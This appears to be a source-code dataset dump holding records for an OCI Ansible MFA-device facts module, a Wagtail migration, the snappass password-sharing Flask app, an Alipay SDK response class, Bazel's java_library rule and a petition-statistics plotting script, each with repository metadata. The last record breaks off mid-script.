version_added: "2.9"
author: Oracle (@oracle)
options:
user_id:
description:
- The OCID of the user.
type: str
required: true
mfa_totp_device_id:
description:
- The OCID of the MFA TOTP device.
- Required to get a specific mfa_totp_device.
type: str
aliases: ["id"]
sort_by:
description:
- The field to sort by. You can provide one sort order (`sortOrder`). Default order for
TIMECREATED is descending. Default order for NAME is ascending. The NAME
sort order is case sensitive.
- "**Note:** In general, some \\"List\\" operations (for example, `ListInstances`) let you
optionally filter by Availability Domain if the scope of the resource type is within a
single Availability Domain. If you call one of these \\"List\\" operations without specifying
an Availability Domain, the resources are grouped by Availability Domain, then sorted."
type: str
choices:
- "TIMECREATED"
- "NAME"
sort_order:
description:
- The sort order to use, either ascending (`ASC`) or descending (`DESC`). The NAME sort order
is case sensitive.
type: str
choices:
- "ASC"
- "DESC"
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: List mfa_totp_devices
oci_identity_mfa_totp_device_facts:
user_id: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
- name: Get a specific mfa_totp_device
oci_identity_mfa_totp_device_facts:
user_id: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
mfa_totp_device_id: ocid1.mfatotpdevice.oc1..xxxxxxEXAMPLExxxxxx
"""
RETURN = """
mfa_totp_devices:
description:
- List of MfaTotpDevice resources
returned: on success
type: complex
contains:
id:
description:
- The OCID of the MFA TOTP Device.
returned: on success
type: string
sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx
user_id:
description:
- The OCID of the user the MFA TOTP device belongs to.
returned: on success
type: string
sample: ocid1.user.oc1..xxxxxxEXAMPLExxxxxx
time_created:
description:
- Date and time the `MfaTotpDevice` object was created, in the format defined by RFC3339.
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
time_expires:
description:
- Date and time when this MFA TOTP device will expire, in the format defined by RFC3339.
Null if it never expires.
- "Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: string
sample: 2016-08-25T21:10:29.600Z
lifecycle_state:
description:
- The MFA TOTP device's current state.
returned: on success
type: string
sample: CREATING
inactive_status:
description:
- "The detailed status of INACTIVE lifecycleState.
Allowed values are:
- 1 - SUSPENDED
- 2 - DISABLED
- 4 - BLOCKED
- 8 - LOCKED"
returned: on success
type: int
sample: 56
is_activated:
description:
- Flag to indicate if the MFA TOTP device has been activated
returned: on success
type: bool
sample: true
sample: [{
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"user_id": "ocid1.user.oc1..xxxxxxEXAMPLExxxxxx",
"time_created": "2016-08-25T21:10:29.600Z",
"time_expires": "2016-08-25T21:10:29.600Z",
"lifecycle_state": "CREATING",
"inactive_status": 56,
"is_activated": true
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.identity import IdentityClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class MfaTotpDeviceFactsHelperGen(OCIResourceFactsHelperBase):
def get_required_params_for_get(self):
return [
"user_id",
"mfa_totp_device_id",
]
def get_required_params_for_list(self):
return [
"user_id",
]
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_mfa_totp_device,
user_id=self.module.params.get("user_id"),
mfa_totp_device_id=self.module.params.get("mfa_totp_device_id"),
)
def list_resources(self):
optional_list_method_params = [
"sort_by",
"sort_order",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_mfa_totp_devices,
user_id=self.module.params.get("user_id"),
**optional_kwargs
)
MfaTotpDeviceFactsHelperCustom = get_custom_class("MfaTotpDeviceFactsHelperCustom")
class ResourceFactsHelper(MfaTotpDeviceFactsHelperCustom, MfaTotpDeviceFactsHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
user_id=dict(type="str", required=True),
mfa_totp_device_id=dict(aliases=["id"], type="str"),
sort_by=dict(type="str", choices=["TIMECREATED", "NAME"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="mfa_totp_device",
service_client_class=IdentityClient,
namespace="identity",
)
result = []
if resource_facts_helper.is_get():
result = [resource_facts_helper.get()]
elif resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(mfa_totp_devices=result)
if __name__ == "__main__":
main()
| true
| true
|
790b3069425ae07e9b69a0a75534c8754c5f4767
| 2,284
|
py
|
Python
|
wagtail/tests/testapp/migrations/0014_m2m_blog_page.py
|
seddonym/wagtail-tableblock
|
aea3ce67a0800285b20b93018b7c0a8679e479b7
|
[
"BSD-3-Clause"
] | null | null | null |
wagtail/tests/testapp/migrations/0014_m2m_blog_page.py
|
seddonym/wagtail-tableblock
|
aea3ce67a0800285b20b93018b7c0a8679e479b7
|
[
"BSD-3-Clause"
] | null | null | null |
wagtail/tests/testapp/migrations/0014_m2m_blog_page.py
|
seddonym/wagtail-tableblock
|
aea3ce67a0800285b20b93018b7c0a8679e479b7
|
[
"BSD-3-Clause"
] | 1
|
2019-03-05T15:37:22.000Z
|
2019-03-05T15:37:22.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import wagtail.wagtailcore.fields
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0020_add_index_on_page_first_published_at'),
('tests', '0013_iconsetting_notyetregisteredsetting_testsetting'),
]
operations = [
migrations.CreateModel(
name='BlogCategory',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('name', models.CharField(unique=True, max_length=80)),
],
),
migrations.CreateModel(
name='BlogCategoryBlogPage',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('category', models.ForeignKey(to='tests.BlogCategory', related_name='+')),
],
),
migrations.CreateModel(
name='ManyToManyBlogPage',
fields=[
(
'page_ptr',
models.OneToOneField(
primary_key=True,
serialize=False,
parent_link=True,
auto_created=True,
to='wagtailcore.Page'
)
),
('body', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('adverts', models.ManyToManyField(to='tests.Advert', blank=True)),
(
'blog_categories',
models.ManyToManyField(
to='tests.BlogCategory',
through='tests.BlogCategoryBlogPage',
blank=True
)
),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.AddField(
model_name='blogcategoryblogpage',
name='page',
field=modelcluster.fields.ParentalKey(to='tests.ManyToManyBlogPage', related_name='categories'),
),
]
| 34.606061
| 114
| 0.510508
|
from __future__ import unicode_literals
from django.db import models, migrations
import wagtail.wagtailcore.fields
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0020_add_index_on_page_first_published_at'),
('tests', '0013_iconsetting_notyetregisteredsetting_testsetting'),
]
operations = [
migrations.CreateModel(
name='BlogCategory',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('name', models.CharField(unique=True, max_length=80)),
],
),
migrations.CreateModel(
name='BlogCategoryBlogPage',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('category', models.ForeignKey(to='tests.BlogCategory', related_name='+')),
],
),
migrations.CreateModel(
name='ManyToManyBlogPage',
fields=[
(
'page_ptr',
models.OneToOneField(
primary_key=True,
serialize=False,
parent_link=True,
auto_created=True,
to='wagtailcore.Page'
)
),
('body', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('adverts', models.ManyToManyField(to='tests.Advert', blank=True)),
(
'blog_categories',
models.ManyToManyField(
to='tests.BlogCategory',
through='tests.BlogCategoryBlogPage',
blank=True
)
),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.AddField(
model_name='blogcategoryblogpage',
name='page',
field=modelcluster.fields.ParentalKey(to='tests.ManyToManyBlogPage', related_name='categories'),
),
]
| true
| true
|
790b30b8fe31efd2d8b8814bd7607f2d2230fe09
| 5,404
|
py
|
Python
|
snappass/main.py
|
e2x/snappass
|
f7fbb4575ce59ee4c427ae087abcd462b867e01e
|
[
"MIT"
] | null | null | null |
snappass/main.py
|
e2x/snappass
|
f7fbb4575ce59ee4c427ae087abcd462b867e01e
|
[
"MIT"
] | null | null | null |
snappass/main.py
|
e2x/snappass
|
f7fbb4575ce59ee4c427ae087abcd462b867e01e
|
[
"MIT"
] | 1
|
2021-05-05T11:58:47.000Z
|
2021-05-05T11:58:47.000Z
|
import os
import re
import sys
import uuid
import redis
from cryptography.fernet import Fernet
from flask import abort, Flask, render_template, request
from redis.exceptions import ConnectionError
from werkzeug.urls import url_quote_plus
from werkzeug.urls import url_unquote_plus
NO_SSL = os.environ.get('NO_SSL', False)
TOKEN_SEPARATOR = '~'
# Initialize Flask Application
app = Flask(__name__)
if os.environ.get('DEBUG'):
app.debug = True
app.secret_key = os.environ.get('SECRET_KEY', 'Secret Key')
app.config.update(
dict(STATIC_URL=os.environ.get('STATIC_URL', 'static')))
# Initialize Redis
if os.environ.get('MOCK_REDIS'):
from mockredis import mock_strict_redis_client
redis_client = mock_strict_redis_client()
elif os.environ.get('REDIS_URL'):
redis_client = redis.StrictRedis.from_url(os.environ.get('REDIS_URL'))
else:
redis_host = os.environ.get('REDIS_HOST', 'localhost')
redis_port = os.environ.get('REDIS_PORT', 6379)
redis_db = os.environ.get('SNAPPASS_REDIS_DB', 0)
redis_client = redis.StrictRedis(
host=redis_host, port=redis_port, db=redis_db)
REDIS_PREFIX = os.environ.get('REDIS_PREFIX', 'snappass')
TIME_CONVERSION = {'week': 604800, 'day': 86400, 'hour': 3600}
def check_redis_alive(fn):
def inner(*args, **kwargs):
try:
if fn.__name__ == 'main':
redis_client.ping()
return fn(*args, **kwargs)
except ConnectionError as e:
            print('Failed to connect to redis! %s' % e)
if fn.__name__ == 'main':
sys.exit(0)
else:
return abort(500)
return inner
def encrypt(password):
"""
Take a password string, encrypt it with Fernet symmetric encryption,
and return the result (bytes), with the decryption key (bytes)
"""
encryption_key = Fernet.generate_key()
fernet = Fernet(encryption_key)
encrypted_password = fernet.encrypt(password.encode('utf-8'))
return encrypted_password, encryption_key
def decrypt(password, decryption_key):
"""
Decrypt a password (bytes) using the provided key (bytes),
and return the plain-text password (bytes).
"""
fernet = Fernet(decryption_key)
return fernet.decrypt(password)
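# A minimal sketch of the symmetric round trip implemented above (values are
# illustrative):
#
#   ciphertext, key = encrypt("hunter2")
#   decrypt(ciphertext, key)  # -> b"hunter2"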
def parse_token(token):
token_fragments = token.split(TOKEN_SEPARATOR, 1) # Split once, not more.
storage_key = token_fragments[0]
try:
decryption_key = token_fragments[1].encode('utf-8')
except IndexError:
decryption_key = None
return storage_key, decryption_key
@check_redis_alive
def set_password(password, ttl):
"""
Encrypt and store the password for the specified lifetime.
Returns a token comprised of the key where the encrypted password
is stored, and the decryption key.
"""
storage_key = REDIS_PREFIX + uuid.uuid4().hex
encrypted_password, encryption_key = encrypt(password)
redis_client.setex(storage_key, ttl, encrypted_password)
encryption_key = encryption_key.decode('utf-8')
token = TOKEN_SEPARATOR.join([storage_key, encryption_key])
return token
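# The resulting token therefore looks roughly like
# "snappass<32 hex chars>~<url-safe Fernet key>" (illustrative shape, not a
# real value); parse_token() splits the Redis storage key and the decryption
# key apart again when the password is retrieved.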
@check_redis_alive
def get_password(token):
"""
From a given token, return the initial password.
If the token is tilde-separated, we decrypt the password fetched from Redis.
If not, the password is simply returned as is.
"""
storage_key, decryption_key = parse_token(token)
password = redis_client.get(storage_key)
redis_client.delete(storage_key)
if password is not None:
if decryption_key is not None:
password = decrypt(password, decryption_key)
return password.decode('utf-8')
@check_redis_alive
def password_exists(token):
storage_key, decryption_key = parse_token(token)
return redis_client.exists(storage_key)
def empty(value):
if not value:
return True
def clean_input():
"""
Make sure we're not getting bad data from the front end,
format data to be machine readable
"""
if empty(request.form.get('password', '')):
abort(400)
if empty(request.form.get('ttl', '')):
abort(400)
time_period = request.form['ttl'].lower()
if time_period not in TIME_CONVERSION:
abort(400)
return TIME_CONVERSION[time_period], request.form['password']
@app.route('/', methods=['GET'])
def index():
return render_template('set_password.html')
@app.route('/', methods=['POST'])
def handle_password():
ttl, password = clean_input()
token = set_password(password, ttl)
if NO_SSL:
base_url = request.url_root
else:
base_url = request.url_root.replace("http://", "https://")
link = base_url + url_quote_plus(token)
return render_template('confirm.html', password_link=link)
@app.route('/<password_key>', methods=['GET'])
def preview_password(password_key):
password_key = url_unquote_plus(password_key)
if not password_exists(password_key):
abort(404)
return render_template('preview.html')
@app.route('/<password_key>', methods=['POST'])
def show_password(password_key):
password_key = url_unquote_plus(password_key)
password = get_password(password_key)
if not password:
abort(404)
return render_template('password.html', password=password)
@check_redis_alive
def main():
app.run(host='0.0.0.0')
if __name__ == '__main__':
main()
| 27.292929
| 80
| 0.690044
|
import os
import re
import sys
import uuid
import redis
from cryptography.fernet import Fernet
from flask import abort, Flask, render_template, request
from redis.exceptions import ConnectionError
from werkzeug.urls import url_quote_plus
from werkzeug.urls import url_unquote_plus
NO_SSL = os.environ.get('NO_SSL', False)
TOKEN_SEPARATOR = '~'
app = Flask(__name__)
if os.environ.get('DEBUG'):
app.debug = True
app.secret_key = os.environ.get('SECRET_KEY', 'Secret Key')
app.config.update(
dict(STATIC_URL=os.environ.get('STATIC_URL', 'static')))
if os.environ.get('MOCK_REDIS'):
from mockredis import mock_strict_redis_client
redis_client = mock_strict_redis_client()
elif os.environ.get('REDIS_URL'):
redis_client = redis.StrictRedis.from_url(os.environ.get('REDIS_URL'))
else:
redis_host = os.environ.get('REDIS_HOST', 'localhost')
redis_port = os.environ.get('REDIS_PORT', 6379)
redis_db = os.environ.get('SNAPPASS_REDIS_DB', 0)
redis_client = redis.StrictRedis(
host=redis_host, port=redis_port, db=redis_db)
REDIS_PREFIX = os.environ.get('REDIS_PREFIX', 'snappass')
TIME_CONVERSION = {'week': 604800, 'day': 86400, 'hour': 3600}
def check_redis_alive(fn):
def inner(*args, **kwargs):
try:
if fn.__name__ == 'main':
redis_client.ping()
return fn(*args, **kwargs)
except ConnectionError as e:
            print('Failed to connect to redis! %s' % e)
if fn.__name__ == 'main':
sys.exit(0)
else:
return abort(500)
return inner
def encrypt(password):
encryption_key = Fernet.generate_key()
fernet = Fernet(encryption_key)
encrypted_password = fernet.encrypt(password.encode('utf-8'))
return encrypted_password, encryption_key
def decrypt(password, decryption_key):
fernet = Fernet(decryption_key)
return fernet.decrypt(password)
def parse_token(token):
token_fragments = token.split(TOKEN_SEPARATOR, 1)
storage_key = token_fragments[0]
try:
decryption_key = token_fragments[1].encode('utf-8')
except IndexError:
decryption_key = None
return storage_key, decryption_key
@check_redis_alive
def set_password(password, ttl):
storage_key = REDIS_PREFIX + uuid.uuid4().hex
encrypted_password, encryption_key = encrypt(password)
redis_client.setex(storage_key, ttl, encrypted_password)
encryption_key = encryption_key.decode('utf-8')
token = TOKEN_SEPARATOR.join([storage_key, encryption_key])
return token
@check_redis_alive
def get_password(token):
storage_key, decryption_key = parse_token(token)
password = redis_client.get(storage_key)
redis_client.delete(storage_key)
if password is not None:
if decryption_key is not None:
password = decrypt(password, decryption_key)
return password.decode('utf-8')
@check_redis_alive
def password_exists(token):
storage_key, decryption_key = parse_token(token)
return redis_client.exists(storage_key)
def empty(value):
if not value:
return True
def clean_input():
if empty(request.form.get('password', '')):
abort(400)
if empty(request.form.get('ttl', '')):
abort(400)
time_period = request.form['ttl'].lower()
if time_period not in TIME_CONVERSION:
abort(400)
return TIME_CONVERSION[time_period], request.form['password']
@app.route('/', methods=['GET'])
def index():
return render_template('set_password.html')
@app.route('/', methods=['POST'])
def handle_password():
ttl, password = clean_input()
token = set_password(password, ttl)
if NO_SSL:
base_url = request.url_root
else:
base_url = request.url_root.replace("http://", "https://")
link = base_url + url_quote_plus(token)
return render_template('confirm.html', password_link=link)
@app.route('/<password_key>', methods=['GET'])
def preview_password(password_key):
password_key = url_unquote_plus(password_key)
if not password_exists(password_key):
abort(404)
return render_template('preview.html')
@app.route('/<password_key>', methods=['POST'])
def show_password(password_key):
password_key = url_unquote_plus(password_key)
password = get_password(password_key)
if not password:
abort(404)
return render_template('password.html', password=password)
@check_redis_alive
def main():
app.run(host='0.0.0.0')
if __name__ == '__main__':
main()
| true
| true
|
790b30bb249216e305afd822386e038ae1bd80bf
| 694
|
py
|
Python
|
alipay/aop/api/response/AlipayCommerceAntestCaselistQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/response/AlipayCommerceAntestCaselistQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/response/AlipayCommerceAntestCaselistQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceAntestCaselistQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceAntestCaselistQueryResponse, self).__init__()
self._data = None
@property
def data(self):
return self._data
@data.setter
def data(self, value):
self._data = value
def parse_response_content(self, response_content):
response = super(AlipayCommerceAntestCaselistQueryResponse, self).parse_response_content(response_content)
if 'data' in response:
self.data = response['data']
| 26.692308
| 114
| 0.706052
|
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceAntestCaselistQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceAntestCaselistQueryResponse, self).__init__()
self._data = None
@property
def data(self):
return self._data
@data.setter
def data(self, value):
self._data = value
def parse_response_content(self, response_content):
response = super(AlipayCommerceAntestCaselistQueryResponse, self).parse_response_content(response_content)
if 'data' in response:
self.data = response['data']
| true
| true
|
790b319ae4af0618d5e780d5ec1f5e926956e06f
| 3,240
|
bzl
|
Python
|
src/main/starlark/builtins_bzl/common/java/java_library.bzl
|
omarzl/bazel
|
2e723f228efee008bcfd62ceb74a176a357c4c32
|
[
"Apache-2.0"
] | null | null | null |
src/main/starlark/builtins_bzl/common/java/java_library.bzl
|
omarzl/bazel
|
2e723f228efee008bcfd62ceb74a176a357c4c32
|
[
"Apache-2.0"
] | null | null | null |
src/main/starlark/builtins_bzl/common/java/java_library.bzl
|
omarzl/bazel
|
2e723f228efee008bcfd62ceb74a176a357c4c32
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Definition of java_library rule.
"""
load(":common/java/java_common.bzl", "JAVA_COMMON_DEP")
load(":common/rule_util.bzl", "create_rule")
load(":common/java/java_semantics.bzl", "semantics")
load(":common/java/proguard_validation.bzl", "VALIDATE_PROGUARD_SPECS")
JavaInfo = _builtins.toplevel.JavaInfo
JavaPluginInfo = _builtins.toplevel.JavaPluginInfo
CcInfo = _builtins.toplevel.CcInfo
def _java_library_rule_impl(ctx):
if not ctx.attr.srcs and ctx.attr.deps:
fail("deps not allowed without srcs; move to runtime_deps?")
semantics.check_rule(ctx)
semantics.check_dependency_rule_kinds(ctx)
extra_resources = semantics.preprocess(ctx)
base_info = JAVA_COMMON_DEP.call(ctx, extra_resources = extra_resources, output_prefix = "lib")
proguard_specs_provider = VALIDATE_PROGUARD_SPECS.call(ctx)
base_info.output_groups["_hidden_top_level_INTERNAL_"] = proguard_specs_provider.specs
base_info.extra_providers.append(proguard_specs_provider)
java_info = semantics.postprocess(ctx, base_info)
return [
base_info.default_info,
java_info,
base_info.instrumented_files_info,
OutputGroupInfo(**base_info.output_groups),
] + base_info.extra_providers
java_library = create_rule(
_java_library_rule_impl,
attrs = dict(
{
"runtime_deps": attr.label_list(
allow_files = [".jar"],
allow_rules = semantics.ALLOWED_RULES_IN_DEPS,
providers = [[CcInfo], [JavaInfo]],
flags = ["SKIP_ANALYSIS_TIME_FILETYPE_CHECK"],
),
"exports": attr.label_list(
allow_rules = semantics.ALLOWED_RULES_IN_DEPS,
providers = [[JavaInfo], [CcInfo]],
),
"exported_plugins": attr.label_list(
providers = [JavaPluginInfo],
cfg = "exec",
),
"licenses": attr.license() if hasattr(attr, "license") else attr.string_list(),
},
**dict(
semantics.EXTRA_ATTRIBUTES,
**({
"classjar": attr.output(),
"sourcejar": attr.output(),
} if semantics.EXPERIMENTAL_USE_OUTPUTATTR_IN_JAVALIBRARY else {})
)
),
deps = [JAVA_COMMON_DEP, VALIDATE_PROGUARD_SPECS] + semantics.EXTRA_DEPS,
provides = [JavaInfo],
outputs = {} if semantics.EXPERIMENTAL_USE_FILEGROUPS_IN_JAVALIBRARY or semantics.EXPERIMENTAL_USE_OUTPUTATTR_IN_JAVALIBRARY else {
"classjar": "lib%{name}.jar",
"sourcejar": "lib%{name}-src.jar",
},
compile_one_filetype = ".java",
)
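# A minimal sketch of how a BUILD file might instantiate this rule (target and
# file names are illustrative, not taken from this repository):
#
#   java_library(
#       name = "greeter",
#       srcs = ["Greeter.java"],
#       deps = ["//some/other:lib"],
#   )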
| 36.818182
| 135
| 0.674691
|
load(":common/java/java_common.bzl", "JAVA_COMMON_DEP")
load(":common/rule_util.bzl", "create_rule")
load(":common/java/java_semantics.bzl", "semantics")
load(":common/java/proguard_validation.bzl", "VALIDATE_PROGUARD_SPECS")
JavaInfo = _builtins.toplevel.JavaInfo
JavaPluginInfo = _builtins.toplevel.JavaPluginInfo
CcInfo = _builtins.toplevel.CcInfo
def _java_library_rule_impl(ctx):
if not ctx.attr.srcs and ctx.attr.deps:
fail("deps not allowed without srcs; move to runtime_deps?")
semantics.check_rule(ctx)
semantics.check_dependency_rule_kinds(ctx)
extra_resources = semantics.preprocess(ctx)
base_info = JAVA_COMMON_DEP.call(ctx, extra_resources = extra_resources, output_prefix = "lib")
proguard_specs_provider = VALIDATE_PROGUARD_SPECS.call(ctx)
base_info.output_groups["_hidden_top_level_INTERNAL_"] = proguard_specs_provider.specs
base_info.extra_providers.append(proguard_specs_provider)
java_info = semantics.postprocess(ctx, base_info)
return [
base_info.default_info,
java_info,
base_info.instrumented_files_info,
OutputGroupInfo(**base_info.output_groups),
] + base_info.extra_providers
java_library = create_rule(
_java_library_rule_impl,
attrs = dict(
{
"runtime_deps": attr.label_list(
allow_files = [".jar"],
allow_rules = semantics.ALLOWED_RULES_IN_DEPS,
providers = [[CcInfo], [JavaInfo]],
flags = ["SKIP_ANALYSIS_TIME_FILETYPE_CHECK"],
),
"exports": attr.label_list(
allow_rules = semantics.ALLOWED_RULES_IN_DEPS,
providers = [[JavaInfo], [CcInfo]],
),
"exported_plugins": attr.label_list(
providers = [JavaPluginInfo],
cfg = "exec",
),
"licenses": attr.license() if hasattr(attr, "license") else attr.string_list(),
},
**dict(
semantics.EXTRA_ATTRIBUTES,
**({
"classjar": attr.output(),
"sourcejar": attr.output(),
} if semantics.EXPERIMENTAL_USE_OUTPUTATTR_IN_JAVALIBRARY else {})
)
),
deps = [JAVA_COMMON_DEP, VALIDATE_PROGUARD_SPECS] + semantics.EXTRA_DEPS,
provides = [JavaInfo],
outputs = {} if semantics.EXPERIMENTAL_USE_FILEGROUPS_IN_JAVALIBRARY or semantics.EXPERIMENTAL_USE_OUTPUTATTR_IN_JAVALIBRARY else {
"classjar": "lib%{name}.jar",
"sourcejar": "lib%{name}-src.jar",
},
compile_one_filetype = ".java",
)
| true
| true
|
790b328b89c6f9bc48583162fd7cf5e176afc177
| 4,239
|
py
|
Python
|
network/get_sig_histogram.py
|
yukimasano/pet_forecast
|
57547fee4c222313e9c958536f60da4f43e23c8c
|
[
"MIT"
] | null | null | null |
network/get_sig_histogram.py
|
yukimasano/pet_forecast
|
57547fee4c222313e9c958536f60da4f43e23c8c
|
[
"MIT"
] | 1
|
2018-02-19T21:08:08.000Z
|
2018-02-23T10:45:57.000Z
|
network/get_sig_histogram.py
|
yukimasano/pet_forecast
|
57547fee4c222313e9c958536f60da4f43e23c8c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 28 12:54:52 2016
@author: YPC
"""
import matplotlib.pyplot as plt
import json
import numpy
import datetime
f=open('../petitions.json', 'r')
met=json.load(f)
f.close()
s=[]
s2=[]
""" this plots the signature distribution function"""
if False:
for i in range(len(met)):
s.append( met[i]['petition']['signature_count'])
s=numpy.array(s)
s=sorted(s, reverse=True)
fig=plt.figure(figsize=(7, 4.5))
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
plt.loglog(s,'-',color='darkblue',marker='x')
plt.loglog([1,len(s)],[100000,100000])
plt.loglog([1,len(s)],[10000,10000])
plt.title("Signatures distribution")
plt.xlabel("Rank")
plt.ylabel("Number of Signatures")
plt.tight_layout()
plt.legend(['Signatures','100,000','10,000'],loc=3,fontsize=12)
fig.savefig('Signatures_dist', dpi=500)
#%%
""" this plots the distr of len(text) """
if True:
for i in range(len(met)):
s.append( len(met[i]['petition']['description']))
if len(met[i]['petition']['description']) ==1000:
            print(met[i]['petition']['description'])
fig=plt.figure(figsize=(4.5, 4.5))
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
    plt.hist(s, bins=1000)
plt.title("Histogram of textlengths")
plt.ylabel("Number of petitions")
plt.xlabel("Length of text")
plt.tight_layout()
#fig.savefig('textlen_dist', dpi=500)
#%%
""" this plots the distr of len(text) """
if False:
for i in range(len(met)):
if met[i]['petition']['signature_count'] >1000:
s.append( len(met[i]['petition']['description']))
s2.append( len(met[i]['petition']['description']))
plt.rcParams.update({'font.size': 12})
plt.rc('font', family='serif')
    _, bins, _ = plt.hist(s, bins=50)
fig, ax1 = plt.subplots()
fig.set_size_inches(7,4.5)
ax1.hist(s2,bins=bins,color='k',histtype='step')
ax1.set_ylabel('Petitions', color='k')
ax2 = ax1.twinx()
ax2.hist(s,bins=bins,color='b',histtype='step')
ax2.set_ylabel('Petitions with \n >1,000 signatures',color='b')
plt.title("Histogram of textlengths")
ax1.set_xlabel("Length of text")
plt.show()
fig.tight_layout()
fig.savefig('textlen_s_dist', dpi=500)
#%%
""" this plots the cum number of len(text)"""
if False:
k=0
for i in range(len(met)):
k=k+1
t = met[i]['petition']['created_datetime']
        dt = t[0:10]
t0 = datetime.datetime(int(dt[0:4]),int(dt[5:7]),int(dt[8:10]))
s.append(t0)
s2.append(k)
fig, ax = plt.subplots()
fig.set_size_inches(8,3)
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
ax.plot(s,s2,color='darkblue')
plt.title("Cumulative number of petitions")
plt.ylabel("Number of Petitions",fontsize=15)
ax.set_xlim([734300,735687])
for label in ax.xaxis.get_ticklabels()[1::2]:
label.set_visible(False)
ax.xaxis.get_ticklabels()[0].set_visible(True)
ax.xaxis.get_ticklabels()[-1].set_visible(True)
ax.tick_params(axis='both', which='major', labelsize=10)
plt.tight_layout()
fig.savefig('pets_vs_time', dpi=500)
#%%
if False:
for i in range(len(met)):
if int(met[i]['petition']['signature_count'])<100000 and int(met[i]['petition']['signature_count'])>5000:
            print(met[i]['petition']['id'], met[i]['petition']['signature_count'])
#347 148373
#885 149470
#1535 113490
#2199 156218
#7337 258276
#8903 118875
#19149 118475
#19658 145544
#22321 102701
#22670 179466
#29349 154662
#29399 110704
#29664 108848
#31778 114499
#33133 117469
#35788 109306
#37180 174578
#38257 304255
#40925 106210
#41492 153828
#43154 104818
#45969 134835
#46455 170931
#48389 106410
#48628 104068
#49528 111572
#52740 110561
#53523 123881
#56810 107261
#58166 103063
#60164 113797
#62385 327877
#62490 123307
#63445 103479
#64331 118956
#64997 112285
#67165 124511
#67911 102170
#71455 118068
#73911 103841
#74830 135408
| 27.888158
| 114
| 0.610757
|
"""
Created on Mon Mar 28 12:54:52 2016
@author: YPC
"""
import matplotlib.pyplot as plt
import json
import numpy
import datetime
f=open('../petitions.json', 'r')
met=json.load(f)
f.close()
s=[]
s2=[]
""" this plots the signature distribution function"""
if False:
for i in range(len(met)):
s.append( met[i]['petition']['signature_count'])
s=numpy.array(s)
s=sorted(s, reverse=True)
fig=plt.figure(figsize=(7, 4.5))
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
plt.loglog(s,'-',color='darkblue',marker='x')
plt.loglog([1,len(s)],[100000,100000])
plt.loglog([1,len(s)],[10000,10000])
plt.title("Signatures distribution")
plt.xlabel("Rank")
plt.ylabel("Number of Signatures")
plt.tight_layout()
plt.legend(['Signatures','100,000','10,000'],loc=3,fontsize=12)
fig.savefig('Signatures_dist', dpi=500)
""" this plots the distr of len(text) """
if True:
for i in range(len(met)):
s.append( len(met[i]['petition']['description']))
